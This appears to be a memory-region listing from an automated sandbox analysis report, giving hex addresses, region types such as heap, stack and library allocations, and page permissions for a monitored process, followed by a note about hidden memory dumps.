page read and write
4B18000
heap
page read and write
69B0000
trusted library allocation
page read and write
54E0000
trusted library allocation
page read and write
6E9F000
heap
page read and write
305C000
stack
page read and write
6FAC000
heap
page read and write
4CC0000
heap
page read and write
53DB000
stack
page read and write
4990000
heap
page read and write
6FA1000
heap
page read and write
5AF9000
trusted library allocation
page read and write
7880000
trusted library allocation
page read and write
54DB000
heap
page read and write
6F1A000
heap
page read and write
4855000
heap
page read and write
6F66000
heap
page read and write
315C000
heap
page read and write
2D29000
heap
page read and write
4B1B000
heap
page read and write
7360000
trusted library allocation
page read and write
27EA000
heap
page read and write
73BA000
stack
page read and write
6F83000
heap
page read and write
455E000
stack
page read and write
7380000
trusted library allocation
page read and write
7B4D000
stack
page read and write
71B0000
trusted library allocation
page read and write
AB3000
trusted library allocation
page execute and read and write
7934000
heap
page read and write
66B2000
direct allocation
page read and write
6F49000
heap
page read and write
2C80000
trusted library allocation
page execute and read and write
6F26000
heap
page read and write
2705000
heap
page read and write
7430000
trusted library allocation
page read and write
6EA2000
heap
page read and write
6F9A000
heap
page read and write
281A000
heap
page read and write
3320000
heap
page read and write
2B50000
trusted library allocation
page read and write
873E000
stack
page read and write
74DD000
stack
page read and write
6341000
trusted library allocation
page read and write
A00000
trusted library allocation
page read and write
2B60000
heap
page read and write
4878000
heap
page read and write
6FD3000
heap
page read and write
653F000
trusted library allocation
page read and write
7750000
heap
page read and write
A42000
trusted library allocation
page read and write
6DD4000
heap
page read and write
6A21000
heap
page read and write
7400000
trusted library allocation
page read and write
6216000
trusted library allocation
page read and write
2CF7000
heap
page read and write
4C70000
trusted library allocation
page read and write
5026000
trusted library allocation
page read and write
7F4D000
stack
page read and write
451E000
stack
page read and write
6CDE000
stack
page read and write
6F6B000
heap
page read and write
6FFE000
heap
page read and write
4DF5000
heap
page execute and read and write
7B3E000
direct allocation
page read and write
280B000
heap
page read and write
7138000
heap
page read and write
2FB8000
heap
page read and write
71EE000
stack
page read and write
542A000
trusted library allocation
page read and write
6B70000
heap
page read and write
27EA000
heap
page read and write
7EA0000
trusted library allocation
page execute and read and write
4B0E000
stack
page read and write
768E000
stack
page read and write
7480000
trusted library allocation
page read and write
728A000
trusted library allocation
page read and write
71D0000
trusted library allocation
page read and write
6F8E000
heap
page read and write
4AC0000
heap
page execute and read and write
4B95000
heap
page read and write
87FE000
stack
page read and write
4AB9000
heap
page read and write
2FA2000
heap
page read and write
652F000
stack
page read and write
4627000
heap
page read and write
6E6F000
stack
page read and write
330E000
heap
page read and write
27D6000
heap
page read and write
4B95000
heap
page read and write
2F72000
heap
page read and write
4DF7000
trusted library allocation
page read and write
541A000
trusted library allocation
page read and write
71A0000
trusted library allocation
page read and write
7B3E000
direct allocation
page read and write
2C90000
heap
page read and write
774E000
stack
page read and write
3480000
trusted library allocation
page read and write
7220000
heap
page read and write
73F0000
trusted library allocation
page read and write
4BBE000
stack
page read and write
7D40000
trusted library allocation
page read and write
6284000
heap
page read and write
5050000
heap
page read and write
2DB6000
heap
page read and write
3054000
heap
page read and write
4C20000
trusted library allocation
page read and write
6F24000
heap
page read and write
87BE000
stack
page read and write
6F93000
heap
page read and write
6B0D000
stack
page read and write
4F30000
heap
page read and write
66F0000
direct allocation
page read and write
337D000
trusted library allocation
page execute and read and write
277F000
heap
page read and write
5C61000
trusted library allocation
page read and write
6EEE000
stack
page read and write
5ED1000
trusted library allocation
page read and write
6F52000
heap
page read and write
338B000
heap
page read and write
51C1000
trusted library allocation
page read and write
72AE000
stack
page read and write
6B68000
heap
page read and write
4560000
heap
page read and write
4B95000
heap
page read and write
3340000
heap
page read and write
A60000
heap
page read and write
6F2C000
heap
page read and write
487F000
heap
page read and write
6337000
heap
page read and write
51FA000
trusted library allocation
page read and write
877E000
stack
page read and write
4ACD000
heap
page read and write
6F66000
heap
page read and write
73CD000
stack
page read and write
2D4C000
heap
page read and write
6F9A000
heap
page read and write
2751000
heap
page read and write
4A7F000
stack
page read and write
7890000
heap
page execute and read and write
6F93000
heap
page read and write
78CD000
heap
page read and write
79F0000
trusted library section
page read and write
6F9F000
heap
page read and write
7450000
trusted library allocation
page read and write
C40000
heap
page read and write
71BC000
heap
page read and write
48A3000
heap
page read and write
6FC1000
heap
page read and write
4C00000
heap
page read and write
2F00000
heap
page read and write
4E90000
trusted library allocation
page read and write
4B95000
heap
page read and write
7BF0000
trusted library allocation
page read and write
5B8000
stack
page read and write
5D13000
trusted library allocation
page read and write
539F000
stack
page read and write
788B000
heap
page read and write
990000
heap
page read and write
78FA000
heap
page read and write
334A000
heap
page read and write
7C80000
trusted library allocation
page read and write
7200000
trusted library allocation
page read and write
9B0000
heap
page read and write
62B6000
heap
page read and write
6DCF000
heap
page read and write
31AB000
heap
page read and write
6FA8000
heap
page read and write
6F52000
heap
page read and write
6CD0000
heap
page read and write
6EA0000
heap
page read and write
2817000
heap
page read and write
714E000
heap
page read and write
4CC8000
trusted library allocation
page read and write
71D3000
heap
page read and write
3056000
heap
page read and write
74BB000
stack
page read and write
7B70000
trusted library allocation
page read and write
6FA8000
heap
page read and write
4CC0000
trusted library allocation
page execute and read and write
6CF0000
heap
page read and write
4842000
heap
page read and write
280B000
heap
page read and write
8FD000
stack
page read and write
6F93000
heap
page read and write
9FC000
stack
page read and write
7490000
trusted library allocation
page read and write
A20000
heap
page read and write
6DCD000
heap
page read and write
6240000
heap
page read and write
48A6000
heap
page read and write
4AD8000
heap
page read and write
2F91000
heap
page read and write
34A0000
trusted library allocation
page read and write
7E90000
heap
page read and write
518000
stack
page read and write
A38000
heap
page read and write
2802000
heap
page read and write
A68000
heap
page read and write
7420000
trusted library allocation
page read and write
7C30000
trusted library allocation
page read and write
73C0000
trusted library allocation
page read and write
6F49000
heap
page read and write
2FA3000
heap
page read and write
7150000
trusted library allocation
page read and write
7921000
heap
page read and write
2CCC000
heap
page read and write
48B0000
trusted library allocation
page read and write
4B52000
trusted library allocation
page read and write
5027000
trusted library allocation
page read and write
8252000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
ABD000
trusted library allocation
page execute and read and write
6261000
heap
page read and write
2FD2000
heap
page read and write
6263000
heap
page read and write
2747000
heap
page read and write
750E000
stack
page read and write
488B000
heap
page read and write
7350000
trusted library allocation
page read and write
4ACB000
stack
page read and write
6F52000
heap
page read and write
62BA000
heap
page read and write
32E0000
heap
page read and write
6FA3000
heap
page read and write
727E000
stack
page read and write
6337000
heap
page read and write
27D6000
heap
page read and write
78A0000
trusted library allocation
page read and write
6AC7000
heap
page read and write
6F1C000
heap
page read and write
68D0000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
71F5000
heap
page read and write
887E000
stack
page read and write
6F8E000
heap
page read and write
7BA0000
trusted library allocation
page read and write
280E000
heap
page read and write
7DA0000
heap
page read and write
6F86000
heap
page read and write
4A85000
heap
page read and write
7D60000
heap
page read and write
27F1000
heap
page read and write
49AD000
stack
page read and write
D60000
heap
page read and write
7A8E000
stack
page read and write
6E9F000
heap
page read and write
6FAC000
heap
page read and write
4F3D000
stack
page read and write
4AAC000
heap
page read and write
4DFE000
stack
page read and write
7B10000
direct allocation
page read and write
3056000
heap
page read and write
4AD8000
heap
page read and write
4A80000
heap
page execute and read and write
7BB0000
trusted library allocation
page read and write
6ED6000
heap
page read and write
6FA1000
heap
page read and write
6F52000
heap
page read and write
4C7C000
stack
page read and write
51A4000
heap
page read and write
7410000
trusted library allocation
page read and write
2802000
heap
page read and write
7BC0000
trusted library allocation
page read and write
4B80000
heap
page read and write
6343000
trusted library allocation
page read and write
48A5000
heap
page read and write
810D000
heap
page read and write
7C00000
trusted library allocation
page execute and read and write
70D0000
trusted library allocation
page read and write
3150000
heap
page read and write
5C79000
trusted library allocation
page read and write
624F000
heap
page read and write
4AA0000
heap
page read and write
7ACE000
stack
page read and write
737E000
stack
page read and write
4F60000
heap
page read and write
4B55000
trusted library allocation
page execute and read and write
6F85000
heap
page read and write
721E000
stack
page read and write
8310000
trusted library allocation
page read and write
4A84000
heap
page read and write
6830000
trusted library allocation
page read and write
30D9000
heap
page read and write
792C000
stack
page read and write
2FD2000
heap
page read and write
66D0000
direct allocation
page read and write
6E97000
heap
page read and write
747D000
stack
page read and write
7ED0000
heap
page read and write
714C000
heap
page read and write
6E77000
heap
page read and write
6B4B000
stack
page read and write
27F1000
heap
page read and write
495E000
stack
page read and write
6F24000
heap
page read and write
7FE0000
trusted library allocation
page read and write
2FE1000
heap
page read and write
E9E000
stack
page read and write
6E48000
heap
page read and write
2E9D000
stack
page read and write
AB0000
heap
page readonly
27FF000
heap
page read and write
629A000
heap
page read and write
6FD0000
heap
page read and write
6F5B000
heap
page read and write
61B1000
trusted library allocation
page read and write
4E0D000
trusted library allocation
page read and write
2807000
heap
page read and write
782B000
stack
page read and write
6DD7000
heap
page read and write
2741000
heap
page read and write
3056000
heap
page read and write
7680000
heap
page read and write
2802000
heap
page read and write
8AF0000
trusted library allocation
page read and write
722E000
stack
page read and write
61D9000
trusted library allocation
page read and write
4E36000
heap
page read and write
13C000
stack
page read and write
79D0000
trusted library allocation
page read and write
7BAE000
stack
page read and write
44E000
stack
page read and write
2F7E000
heap
page read and write
4D20000
heap
page read and write
6FA8000
heap
page read and write
552C000
trusted library allocation
page read and write
8270000
trusted library allocation
page execute and read and write
2B49000
trusted library allocation
page read and write
86BD000
stack
page read and write
629B000
heap
page read and write
6C95000
heap
page execute and read and write
6F9A000
heap
page read and write
4B83000
heap
page read and write
6C20000
trusted library allocation
page read and write
62D7000
heap
page read and write
6FBC000
heap
page read and write
770E000
stack
page read and write
4E0D000
stack
page read and write
27F7000
heap
page read and write
7FF0000
trusted library allocation
page read and write
2F40000
trusted library allocation
page read and write
6D5E000
stack
page read and write
7925000
heap
page read and write
7190000
heap
page execute and read and write
51E7000
trusted library allocation
page read and write
5280000
trusted library allocation
page read and write
5040000
heap
page read and write
4AD8000
heap
page read and write
314E000
stack
page read and write
7916000
heap
page read and write
2F05000
heap
page read and write
624F000
heap
page read and write
80B3000
heap
page read and write
6F9D000
heap
page read and write
7CB0000
trusted library allocation
page read and write
6FA8000
heap
page read and write
74A0000
trusted library allocation
page read and write
6F9E000
heap
page read and write
4AD8000
heap
page read and write
3160000
heap
page read and write
4B30000
trusted library allocation
page read and write
AC7000
heap
page read and write
77D7000
heap
page read and write
7EA0000
heap
page read and write
2700000
heap
page read and write
6B71000
heap
page read and write
793D000
heap
page read and write
7EEE0000
trusted library allocation
page execute and read and write
7CD0000
trusted library allocation
page read and write
4DFB000
trusted library allocation
page read and write
745E000
stack
page read and write
73A0000
trusted library allocation
page read and write
6F62000
heap
page read and write
625B000
heap
page read and write
6F83000
heap
page read and write
4AA9000
heap
page read and write
6DC5000
heap
page read and write
4B98000
heap
page read and write
2CBC000
heap
page read and write
6FA3000
heap
page read and write
6253000
heap
page read and write
94E000
stack
page read and write
6F9A000
heap
page read and write
27FE000
heap
page read and write
7390000
trusted library allocation
page read and write
8470000
trusted library allocation
page read and write
5401000
heap
page read and write
7209000
heap
page read and write
341F000
stack
page read and write
7370000
trusted library allocation
page read and write
450000
heap
page read and write
67F2000
heap
page read and write
6FD0000
heap
page read and write
743E000
stack
page read and write
2B5A000
trusted library allocation
page execute and read and write
3489000
trusted library allocation
page read and write
716D000
heap
page read and write
6C80000
trusted library allocation
page read and write
FDE000
stack
page read and write
625B000
heap
page read and write
6F9A000
heap
page read and write
7EC0000
heap
page read and write
2FFA000
heap
page read and write
733D000
stack
page read and write
6FCD000
heap
page read and write
4D30000
heap
page execute and read and write
62D9000
heap
page read and write
7021000
heap
page read and write
6B66000
heap
page read and write
3380000
heap
page read and write
4FA3000
heap
page read and write
4AB4000
heap
page read and write
331F000
heap
page read and write
7CA0000
trusted library allocation
page read and write
4A5E000
stack
page read and write
6FD0000
heap
page read and write
27D6000
heap
page read and write
6F5C000
heap
page read and write
6351000
trusted library allocation
page read and write
27DF000
heap
page read and write
7C20000
trusted library allocation
page read and write
27F6000
heap
page read and write
6E9F000
heap
page read and write
7BE0000
trusted library allocation
page read and write
6DCF000
heap
page read and write
2F68000
heap
page read and write
488F000
heap
page read and write
7169000
heap
page read and write
4DE9000
trusted library allocation
page read and write
4A80000
heap
page read and write
67F0000
trusted library allocation
page execute
7E00000
trusted library allocation
page execute and read and write
2DF1000
heap
page read and write
2B40000
trusted library allocation
page read and write
34A2000
trusted library allocation
page read and write
27D6000
heap
page read and write
5279000
trusted library allocation
page read and write
731B000
stack
page read and write
2FFA000
heap
page read and write
A10000
trusted library allocation
page read and write
5321000
trusted library allocation
page read and write
6F2B000
heap
page read and write
2748000
heap
page read and write
654B000
trusted library allocation
page read and write
3A0000
heap
page read and write
6EA4000
heap
page read and write
7520000
heap
page read and write
62B4000
heap
page read and write
2D8D000
heap
page read and write
72FE000
stack
page read and write
79E0000
trusted library allocation
page read and write
2FB1000
heap
page read and write
71CA000
heap
page read and write
7115000
heap
page read and write
305D000
heap
page read and write
629A000
heap
page read and write
6B5E000
heap
page read and write
4D6E000
stack
page read and write
6FC2000
heap
page read and write
54EB000
heap
page read and write
7EB0000
trusted library allocation
page execute and read and write
5B71000
trusted library allocation
page read and write
4AD8000
heap
page read and write
72AE000
trusted library allocation
page read and write
2772000
heap
page read and write
3196000
heap
page read and write
6F66000
heap
page read and write
7100000
trusted library allocation
page read and write
4E8B000
stack
page read and write
7D20000
heap
page read and write
2B30000
heap
page read and write
700D000
heap
page read and write
305C000
heap
page read and write
8050000
heap
page read and write
6B6E000
heap
page read and write
4FB5000
trusted library allocation
page read and write
6E18000
heap
page read and write
6F8E000
heap
page read and write
8E8C000
stack
page read and write
758E000
stack
page read and write
737E000
stack
page read and write
2BE5000
stack
page read and write
6FBC000
heap
page read and write
4D10000
heap
page readonly
7390000
trusted library allocation
page execute and read and write
7180000
trusted library allocation
page read and write
6EAE000
stack
page read and write
4C3F000
stack
page read and write
754D000
stack
page read and write
6FBC000
heap
page read and write
A1F000
stack
page read and write
66B0000
direct allocation
page read and write
2F60000
heap
page read and write
A45000
trusted library allocation
page execute and read and write
73F0000
trusted library allocation
page read and write
6255000
heap
page read and write
6FB7000
heap
page read and write
9D5000
heap
page read and write
3086000
heap
page read and write
4858000
heap
page read and write
6BC4000
heap
page read and write
6CAE000
stack
page read and write
27E0000
heap
page read and write
6FC1000
heap
page read and write
51B1000
trusted library allocation
page read and write
27FE000
heap
page read and write
66B6000
direct allocation
page read and write
730E000
stack
page read and write
78B0000
trusted library allocation
page execute and read and write
7AEE000
stack
page read and write
72BE000
stack
page read and write
7790000
heap
page read and write
5E0000
heap
page read and write
310C000
heap
page read and write
4828000
heap
page read and write
304E000
stack
page read and write
6DD1000
heap
page read and write
485D000
heap
page read and write
642E000
stack
page read and write
274C000
heap
page read and write
34A5000
trusted library allocation
page execute and read and write
4852000
heap
page read and write
7EEF8000
trusted library allocation
page execute and read and write
4A81000
heap
page read and write
78C5000
heap
page read and write
6FAC000
heap
page read and write
7BF0000
trusted library allocation
page read and write
A19000
trusted library allocation
page read and write
6B5D000
heap
page read and write
6FD0000
heap
page read and write
98E000
unkown
page read and write
484C000
heap
page read and write
280B000
heap
page read and write
25FB000
stack
page read and write
6FD0000
heap
page read and write
71B4000
heap
page read and write
73D3000
trusted library allocation
page read and write
34A7000
trusted library allocation
page execute and read and write
6E9D000
heap
page read and write
27E6000
heap
page read and write
2BCE000
stack
page read and write
5217000
trusted library allocation
page read and write
4CBD000
stack
page read and write
4D0F000
stack
page read and write
6BCE000
stack
page read and write
2FE1000
heap
page read and write
4880000
heap
page read and write
4DE0000
trusted library allocation
page read and write
7380000
heap
page read and write
6F63000
heap
page read and write
2CC2000
heap
page read and write
7C40000
trusted library allocation
page read and write
62B5000
heap
page read and write
2F91000
heap
page read and write
2B62000
trusted library allocation
page read and write
7BED000
stack
page read and write
31A3000
heap
page read and write
7E9D000
stack
page read and write
4E3F000
heap
page read and write
2FA6000
heap
page read and write
6FAC000
heap
page read and write
7230000
trusted library allocation
page read and write
54DE000
heap
page read and write
6C6D000
stack
page read and write
741A000
stack
page read and write
4F33000
trusted library allocation
page read and write
6F2D000
heap
page read and write
71D0000
trusted library allocation
page read and write
867E000
stack
page read and write
3373000
trusted library allocation
page execute and read and write
6FA3000
heap
page read and write
4A88000
heap
page read and write
7160000
heap
page read and write
4AB1000
heap
page read and write
70CE000
heap
page read and write
6F4E000
stack
page read and write
2FB2000
heap
page read and write
27EE000
heap
page read and write
7DF0000
heap
page read and write
62B4000
heap
page read and write
7F0F000
stack
page read and write
8110000
heap
page read and write
6D12000
heap
page read and write
830E000
stack
page read and write
7080000
heap
page read and write
482F000
heap
page read and write
280E000
heap
page read and write
996000
heap
page read and write
27DC000
heap
page read and write
4D9C000
stack
page read and write
347D000
trusted library allocation
page execute and read and write
2FE0000
heap
page read and write
6F90000
heap
page read and write
A04000
trusted library allocation
page read and write
448C000
stack
page read and write
94E000
unkown
page read and write
304C000
heap
page read and write
4BD1000
trusted library allocation
page read and write
3473000
trusted library allocation
page execute and read and write
4A85000
heap
page execute and read and write
2FFA000
heap
page read and write
497E000
stack
page read and write
2FA1000
heap
page read and write
2C0E000
stack
page read and write
7E30000
trusted library allocation
page read and write
49EE000
stack
page read and write
3370000
trusted library allocation
page read and write
4430000
trusted library allocation
page read and write
27EF000
heap
page read and write
583C000
stack
page read and write
4B82000
heap
page read and write
749D000
stack
page read and write
7A3E000
stack
page read and write
59E0000
trusted library allocation
page read and write
4D20000
trusted library allocation
page execute and read and write
4438000
trusted library allocation
page read and write
4854000
heap
page read and write
4AC5000
heap
page read and write
6FD0000
heap
page read and write
4AC0000
heap
page read and write
624B000
heap
page read and write
F9E000
stack
page read and write
A2A000
trusted library allocation
page execute and read and write
2B60000
trusted library allocation
page read and write
304E000
heap
page read and write
2FE0000
heap
page read and write
4E7F000
stack
page read and write
7B6E000
stack
page read and write
277E000
heap
page read and write
6CD1000
heap
page read and write
52BE000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
6D95000
heap
page read and write
5510000
trusted library allocation
page read and write
7287000
trusted library allocation
page read and write
7EE0000
heap
page read and write
2FD9000
heap
page read and write
54E5000
trusted library allocation
page read and write
6FBC000
heap
page read and write
2FB5000
heap
page read and write
5AD1000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
6BC4000
heap
page read and write
5011000
trusted library allocation
page read and write
78F6000
heap
page read and write
4AD8000
heap
page read and write
A40000
trusted library allocation
page read and write
4897000
heap
page read and write
6FB7000
heap
page read and write
590000
heap
page read and write
6534000
trusted library allocation
page read and write
2A60000
heap
page read and write
6DCF000
heap
page read and write
6C22000
heap
page read and write
2FB2000
heap
page read and write
6E19000
heap
page read and write
6B1C000
heap
page read and write
6FCC000
heap
page read and write
7870000
heap
page execute and read and write
4AD8000
heap
page read and write
4EFE000
stack
page read and write
7470000
trusted library allocation
page read and write
3474000
trusted library allocation
page read and write
6345000
trusted library allocation
page read and write
5C81000
trusted library allocation
page read and write
51A0000
heap
page read and write
331E000
stack
page read and write
3363000
heap
page read and write
78BE000
heap
page read and write
52A2000
trusted library allocation
page read and write
719E000
heap
page read and write
291E000
stack
page read and write
6FC1000
heap
page read and write
54DD000
stack
page read and write
483D000
heap
page read and write
88B0000
heap
page read and write
4D85000
heap
page execute and read and write
4E0F000
trusted library allocation
page read and write
4C07000
heap
page read and write
7340000
trusted library allocation
page execute and read and write
4B60000
heap
page execute and read and write
6EA4000
heap
page read and write
593E000
stack
page read and write
7BD0000
trusted library allocation
page read and write
6FAC000
heap
page read and write
68D0000
heap
page read and write
82CE000
stack
page read and write
8620000
trusted library allocation
page read and write
9D0000
heap
page read and write
7911000
heap
page read and write
8280000
trusted library allocation
page read and write
2D4C000
stack
page read and write
6FB7000
heap
page read and write
55A2000
trusted library allocation
page read and write
8113000
heap
page read and write
6FD0000
heap
page read and write
2817000
heap
page read and write
6B8E000
stack
page read and write
48A5000
heap
page read and write
741F000
stack
page read and write
74B0000
trusted library allocation
page read and write
6CEB000
stack
page read and write
51A2000
trusted library allocation
page read and write
280B000
heap
page read and write
2D89000
stack
page read and write
528B000
trusted library allocation
page read and write
6F24000
heap
page read and write
7837000
heap
page read and write
2E50000
heap
page read and write
4CD0000
trusted library allocation
page read and write
2AE0000
heap
page read and write
7B30000
direct allocation
page read and write
There are 1138 hidden memdumps, click here to show them.